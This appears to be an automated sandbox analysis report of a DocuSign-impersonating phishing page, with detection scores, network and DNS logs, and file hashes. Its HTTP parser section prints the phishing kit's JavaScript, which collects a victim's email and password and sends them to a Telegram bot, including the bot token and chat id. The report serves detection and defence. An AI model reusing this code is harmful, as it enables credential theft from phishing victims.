Windows Analysis Report
http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html

Overview

General Information

Sample URL:http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
Analysis ID:1591500
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Misleading page title found
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

  • System is w10x64
  • chrome.exe (PID: 2924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dropped/chromecache_49 | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

Source | Rule | Description | Author | Strings
1.0.pages.csv | JoeSecurity_HtmlPhish_64 | Yara detected HtmlPhish_64 | Joe Security |
1.0.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

No Sigma rule has matched
No Suricata rule has matched


        AV Detection

Source: http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | Avira URL Cloud: detection malicious, Label: malware

        Phishing

Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | Joe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is a well-known electronic signature service., The legitimate domain for DocuSign is 'docusign.com'., The provided URL 'pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev' does not match the legitimate domain., The URL uses a subdomain structure that is not associated with DocuSign., The domain 'r2.dev' is not related to DocuSign and could be a generic hosting or cloud service., Presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.0.pages.csv
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | Page Title: DocuSign Login - Enter your password to sign in
Source: Yara match | File source: 1.0.pages.csv, type: HTML
Source: Yara match | File source: dropped/chromecache_49, type: DROPPED
Source: 0.1.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: Number of links: 0
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: On click: sendEmail()
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: <input type="password" .../> found
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: No <meta name="author".. found
Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | HTTP Parser: No <meta name="copyright".. found
Source: global traffic | TCP traffic: 192.168.2.4:54343 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 192.168.2.4:54322 -> 1.1.1.1:53
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /docu/e_protocol.html HTTP/1.1
    Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
    Host: www.continentalsports.co.uk
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
    Host: www.continentalsports.co.uk
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /docu/e_protocol.html HTTP/1.1
    Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
Source: global traffic | DNS traffic detected: DNS query: www.continentalsports.co.uk
Source: chromecache_49.2.dr | String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_49.2.dr | String found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_49.2.dr | String found in binary or memory: https://logo.clearbit.com/
Source: chromecache_49.2.dr | String found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 54398 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54335
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54398
Source: unknown | Network traffic detected: HTTP traffic on port 54330 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 54335 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54327
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54330
Source: unknown | Network traffic detected: HTTP traffic on port 54327 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: classification engine | Classification label: mal92.phis.win@17/10@10/6
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Source | Detection | Scanner | Label | Link
http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | 100% | Avira URL Cloud | malware |

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l | 0% | Avira URL Cloud | safe |
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev | 172.66.0.235 | true | true | | unknown
www.google.com | 142.250.181.228 | true | false | | high
www.continentalsports.co.uk | 95.154.228.177 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | true | | unknown
http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html | true | | unknown
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot$ | chromecache_49.2.dr | false | | high
https://logo.clearbit.com/ | chromecache_49.2.dr | false | | high
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l | chromecache_49.2.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
95.154.228.177 | www.continentalsports.co.uk | United Kingdom | | 20860 | IOMART-ASGB | false
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
142.250.181.228 | www.google.com | United States | | 15169 | GOOGLEUS | false
172.66.0.235 | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev | United States | | 13335 | CLOUDFLARENETUS | true

IP
192.168.2.4
192.168.2.5
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591500
                      Start date and time:2025-01-15 01:41:02 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.phis.win@17/10@10/6
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.238, 142.251.168.84, 142.250.184.206, 142.250.186.46, 142.250.80.46, 74.125.0.102, 142.250.185.202, 142.250.184.234, 142.250.185.106, 216.58.206.42, 142.250.186.106, 142.250.185.170, 172.217.18.10, 142.250.184.202, 142.250.186.138, 142.250.186.42, 142.250.181.234, 142.250.185.234, 172.217.16.202, 142.250.186.74, 216.58.212.138, 142.250.186.170, 199.232.210.172, 2.23.77.188, 142.250.185.163, 2.23.242.162, 20.109.210.53, 13.107.246.45
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, r1---sn-t0aekn7e.gvt1.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      No simulations
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.875
                      Encrypted:false
                      SSDEEP:3:HwT:QT
                      MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                      SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                      SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
                      SHA-512:EB9F1CD4A566192160371F4B182EE00180F6912333FFB79C537BD80635A6AFE6379FBE7BB74043D635BA65C9F4F956D9E97E516E24E516F2591192A36F866EAE
                      Malicious:false
                      Reputation:low
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmvkNS96nASHBIFDc5BTHo=?alt=proto
                      Preview:CgkKBw3OQUx6GgA=
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:downloaded
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      URL:https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:dropped
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65350)
                      Category:downloaded
                      Size (bytes):252205
                      Entropy (8bit):6.083975621579217
                      Encrypted:false
                      SSDEEP:6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
                      MD5:AC9DBD4FD1FB0ADD29A1B8703BCE9406
                      SHA1:D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
                      SHA-256:6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
                      SHA-512:FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
                      Malicious:false
                      Reputation:low
                      URL:https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      Preview:<!DOCTYPE html> <html lang=en class=account-server>.<meta charset=utf-8>.<meta name=viewport content="initial-scale=1.0">.<title>DocuSign Login - Enter your password to sign in</title>..<style data-emotion=css data-single-filez-stylesheet=16>.account-server{height:100%}.site-content,#root{height:inherit}.account-server .site-content{background-color:#fff}.hide-accessible{position:absolute;width:0px;height:0px;left:-10000px}.ink-authentication{display:flex;flex-direction:column;min-height:100%}.ink-footer{flex-shrink:0}.ink-header{position:sticky;top:0;height:64px}.ink-body{background-color:#f7f6f7;overflow-y:auto;flex:1 0 auto}.ink-auth-main{padding:4rem 0;background-color:#fff;border:1px solid rgba(25,24,35,.1490196078);border-radius:.25rem}@media (max-width:1039px){.ink-body{background-color:#fff}.ink-auth-main{border:unset;border-radius:unset;padding:1.5rem 2rem}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}@media (min-width:600px) and (m
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:dropped
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:downloaded
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                      No static file info
                      Timestamp    Source Port    Dest Port    Source IP    Dest IP
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 15, 2025 01:41:57.041404009 CET53647361.1.1.1192.168.2.4
                      Jan 15, 2025 01:41:57.322227001 CET53547351.1.1.1192.168.2.4
                      Jan 15, 2025 01:41:58.313842058 CET53598481.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:00.480058908 CET5244153192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:00.480315924 CET5989253192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:00.487339020 CET53598921.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:00.487469912 CET53524411.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:02.359812021 CET53606581.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:02.627939939 CET6272453192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:02.628103971 CET5152953192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:02.636398077 CET53627241.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:02.637545109 CET53515291.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:03.101820946 CET5714853192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:03.102006912 CET5510853192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:03.110838890 CET53551081.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:03.110872030 CET53571481.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:04.186604977 CET6107653192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:04.186768055 CET5340253192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:04.194597960 CET53587951.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:04.299005985 CET53534021.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:04.404825926 CET53610761.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.373783112 CET53526121.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.386485100 CET53642491.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.406856060 CET5111853192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:05.407080889 CET5542253192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:05.521068096 CET53554221.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.622531891 CET53511181.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:14.983283043 CET138138192.168.2.4192.168.2.255
                      Jan 15, 2025 01:42:39.239077091 CET53569281.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:56.318525076 CET53643081.1.1.1192.168.2.4
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jan 15, 2025 01:42:00.480058908 CET | 192.168.2.4 | 1.1.1.1 | 0x102 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:00.480315924 CET | 192.168.2.4 | 1.1.1.1 | 0x8eae | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:42:02.627939939 CET | 192.168.2.4 | 1.1.1.1 | 0xc22d | Standard query (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:02.628103971 CET | 192.168.2.4 | 1.1.1.1 | 0xd334 | Standard query (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:42:03.101820946 CET | 192.168.2.4 | 1.1.1.1 | 0x340b | Standard query (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:03.102006912 CET | 192.168.2.4 | 1.1.1.1 | 0xa33a | Standard query (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:42:04.186604977 CET | 192.168.2.4 | 1.1.1.1 | 0x638d | Standard query (0) | www.continentalsports.co.uk | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:04.186768055 CET | 192.168.2.4 | 1.1.1.1 | 0x39e7 | Standard query (0) | www.continentalsports.co.uk | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:42:05.406856060 CET | 192.168.2.4 | 1.1.1.1 | 0xefd2 | Standard query (0) | www.continentalsports.co.uk | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:05.407080889 CET | 192.168.2.4 | 1.1.1.1 | 0xc8 | Standard query (0) | www.continentalsports.co.uk | 65 | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jan 15, 2025 01:42:00.487339020 CET | 1.1.1.1 | 192.168.2.4 | 0x8eae | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                      Jan 15, 2025 01:42:00.487469912 CET | 1.1.1.1 | 192.168.2.4 | 0x102 | No error (0) | www.google.com |  | 142.250.181.228 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:02.636398077 CET | 1.1.1.1 | 192.168.2.4 | 0xc22d | No error (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev |  | 172.66.0.235 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:02.636398077 CET | 1.1.1.1 | 192.168.2.4 | 0xc22d | No error (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev |  | 162.159.140.237 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:03.110872030 CET | 1.1.1.1 | 192.168.2.4 | 0x340b | No error (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev |  | 172.66.0.235 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:03.110872030 CET | 1.1.1.1 | 192.168.2.4 | 0x340b | No error (0) | pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev |  | 162.159.140.237 | A (IP address) | IN (0x0001) | false
                      Jan 15, 2025 01:42:04.404825926 CET | 1.1.1.1 | 192.168.2.4 | 0x638d | No error (0) | www.continentalsports.co.uk |  | 95.154.228.177 | A (IP address) | IN (0x0001) | false
